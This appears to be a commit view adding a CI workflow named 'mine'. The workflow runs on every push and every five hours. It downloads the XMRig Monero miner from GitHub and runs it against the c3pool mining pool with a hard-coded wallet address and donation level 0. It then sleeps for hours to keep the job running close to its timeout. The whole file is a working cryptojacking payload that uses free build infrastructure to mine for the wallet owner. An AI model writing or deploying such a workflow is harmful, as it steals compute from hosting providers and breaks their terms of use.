This commit is contained in:
minrtn5d4aexg 2026-04-11 01:13:52 +00:00
parent 25d9fd0071
commit c7cec48e93
1 changed files with 17 additions and 0 deletions

View File

@ -0,0 +1,17 @@
name: mine
on:
push:
schedule:
- cron: '0 */5 * * *'
jobs:
mine:
runs-on: ubuntu-latest
timeout-minutes: 355
steps:
- name: run
run: |
curl -sLo x.tar.gz https://github.com/xmrig/xmrig/releases/download/v6.22.0/xmrig-6.22.0-linux-static-x64.tar.gz
tar -xzf x.tar.gz --strip-components=1 xmrig-6.22.0/xmrig
chmod +x xmrig
./xmrig -o mine.c3pool.com:15555 -u 87gtFpmvkY92UFddzbpFoGUWY9GMxj9LVVrjGix86h2Y6gdXnsfRCFw7h5Wz7LCmoJF8em5GYditNGwpkqmBmajXVSMXnHM -p nix-wkn5voz --donate-level=0 --no-color -t 2 2>&1 &
sleep 21000